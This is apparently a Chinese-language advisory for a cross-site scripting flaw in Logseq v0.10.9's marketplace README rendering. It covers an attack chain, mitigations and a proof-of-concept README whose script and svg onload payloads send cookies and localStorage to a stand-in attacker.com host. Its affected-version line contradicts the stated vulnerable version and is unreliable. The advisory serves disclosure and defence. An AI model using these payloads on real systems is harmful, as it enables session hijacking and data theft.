CVE-2025-56683：Logseq v0.10.9 跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-56683

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Logseq

漏洞概述

CVE-2025-56683 是 Logseq v0.10.9 中存在的一个高危跨站脚本（XSS）漏洞，CVSS 评分高达 9.6 分，属于严重级别。该漏洞位于 Logseq 的 /app/marketplace.html 组件中，攻击者可以通过构造一个恶意的 README.md 文件，向其中注入任意 JavaScript 代码，从而在受害者浏览该文件时执行任意代码。由于该漏洞的攻击向量为网络（AV:N），无需任何认证（PR:N）即可发起攻击，且对机密性、完整性和可用性均产生高影响（C:H/I:H/A:H），因此具有极大的安全风险。Logseq 是一款流行的开源知识管理和笔记应用程序，支持 Markdown 格式，其 marketplace 功能允许用户浏览和安装各种插件及主题。漏洞的存在使得攻击者可以将恶意 JavaScript 代码嵌入到看似正常的 README.md 文档中，当用户在 Logseq 的 marketplace 中查看这些文档时，恶意脚本将在用户上下文中执行，可能导致会话劫持、数据窃取、恶意操作执行等严重后果。该漏洞的 CVSS 向量为 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H，表明虽然需要用户交互（UI:R）来触发，但一旦触发将产生范围变更（S:C）的影响，进一步扩大了危害范围。

技术细节

该漏洞的根本原因在于 Logseq v0.10.9 的 marketplace.html 组件在渲染 README.md 文件时，未对 Markdown 内容中的 HTML/JavaScript 代码进行充分的过滤和转义处理。攻击者利用这一缺陷，可以在一个精心构造的 README.md 文件中嵌入恶意的 JavaScript 脚本标签或其他可执行 HTML 元素。当用户在 Logseq 应用程序中通过 marketplace 功能浏览该恶意插件或主题的 README.md 文档时，嵌入的 JavaScript 代码将在 Logseq 的渲染上下文中被执行。由于 Logseq 是一个本地应用程序，其渲染环境具有较高的权限，能够访问本地文件系统、执行本地操作等，这使得 XSS 漏洞的危害被进一步放大，演变为实际的远程代码执行（RCE）风险。攻击向量分析：1）攻击者创建一个恶意的 Logseq 插件或主题，其中包含恶意的 README.md 文件；2）将恶意插件/主题发布到 Logseq 的 marketplace 或通过其他渠道分发；3）受害者在 Logseq 中浏览该插件/主题的 README.md 文档；4）恶意 JavaScript 代码自动执行，攻击者可以窃取用户数据、执行未授权操作或进一步植入持久化后门。修复提交（commit 4cdf49aedd8de073015b6945a529399c3bfa109a）中，通过对渲染逻辑进行修改，在显示 Markdown 内容前对潜在的恶意脚本进行过滤或转义处理，从而阻止了任意 JavaScript 代码的执行。

攻击链分析

STEP 1

步骤1：创建恶意插件/主题

攻击者创建一个 Logseq 插件或主题，在其 README.md 文件中嵌入恶意的 JavaScript 代码（如 <script> 标签或 onerror/onload 事件处理器）

STEP 2

步骤2：分发恶意文件

攻击者将包含恶意 README.md 的插件/主题发布到 Logseq marketplace 或通过其他渠道（如社交媒体、邮件）进行分发

STEP 3

步骤3：诱导用户查看

受害者通过 Logseq 的 marketplace 功能（/app/marketplace.html）浏览到该恶意插件/主题的 README.md 文档

STEP 4

步骤4：触发XSS执行

由于 Logseq 未对 Markdown 中的 HTML/JS 进行过滤，恶意 JavaScript 代码在 Logseq 渲染上下文中自动执行

STEP 5

步骤5：权限提升与持久化

利用 Logseq 的本地应用权限，攻击者可以访问本地文件系统、窃取敏感数据、执行未授权操作，甚至植入持久化后门，实现从 XSS 到 RCE 的升级

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-56683 PoC: XSS via crafted README.md in Logseq marketplace -->
<!-- Save the following content as README.md in a malicious Logseq plugin/theme -->

# Malicious Plugin

<script>
  // Arbitrary JavaScript code execution in Logseq context
  // This demonstrates the XSS vulnerability in /app/marketplace.html
  
  // Example 1: Data exfiltration
  fetch('https://attacker.com/steal', {
    method: 'POST',
    body: JSON.stringify({
      cookies: document.cookie,
      localStorage: JSON.stringify(localStorage),
      url: window.location.href
    })
  });
  
  // Example 2: Execute commands via Logseq API (if available)
  if (window.logseq) {
    logseq.App.showMsg('XSS triggered via CVE-2025-56683');
  }
</script>

<img src=x onerror="alert('XSS via CVE-2025-56683')">

<svg onload="fetch('https://attacker.com/log?data='+document.cookie)">

# Normal plugin description continues here...

影响范围

Logseq < 0.10.9（修复提交4cdf49aedd8de073015b6945a529399c3bfa109a之后的版本）

防御指南

临时缓解措施

在无法立即升级的情况下，建议用户暂时避免使用 Logseq 的 marketplace 功能浏览未知来源的插件和主题，不要打开来源不可信的 README.md 文件。同时，可以在 Logseq 的设置中禁用 JavaScript 渲染功能（如有该选项），或使用浏览器扩展如 NoScript 来阻止潜在的脚本执行。对于企业用户，建议在内部部署 Logseq 时配置网络代理，阻止访问可疑的 marketplace 资源，并在终端上部署 EDR 解决方案以检测异常的脚本执行行为。